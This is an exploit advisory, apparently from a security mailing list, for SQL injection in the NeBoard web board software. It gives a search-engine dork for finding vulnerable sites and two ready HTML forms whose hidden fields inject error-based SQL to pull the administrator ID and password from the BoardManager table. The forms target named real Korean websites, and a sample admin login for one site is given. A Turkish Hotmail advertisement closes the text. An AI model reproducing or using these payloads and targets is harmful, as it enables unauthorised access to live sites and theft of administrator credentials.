Discovered by : Alemin_Krali

NeBoard Sql Injection Vulnerability [Post Sql]

Dork :inurl:show.asp?id= ref= step= level= page=

2 html form

1.Form:It takes it:ID NAME
2.Form:Admin Password
and later HTTP://SITE.COM/admin/board_edit.asp?id=IDNAME we are entering and 2.form Admin
Password ile Login we are becoming
#Ex:http://eng.habitat.or.kr/Hboard/admin/board_edit.asp?id=free_old
login password:test and you admin:)

<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin//login_confirm.asp&quot; method="post">
<input type="submit" value="Go ID Name">
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin//login_form.asp&quot;&gt;
<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 ID from
BoardManager))–">

<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin/login_confirm.asp&quot; method="post">
<input type="submit" value="Go ID table Admin Password">
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin/login_form.asp&quot;&gt;
<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 AdminPW from
BoardManager))–">

Gelen kutunuzda hiç yer kalmamasından bıktınız mı? Windows Live Hotmail şimdi size 5GB
ÜCRETSİZ depolama alanı sunuyor! Ücretsiz Windows Live Hotmail hesabınızı buradan alın!
http://get.live.com/mail/overview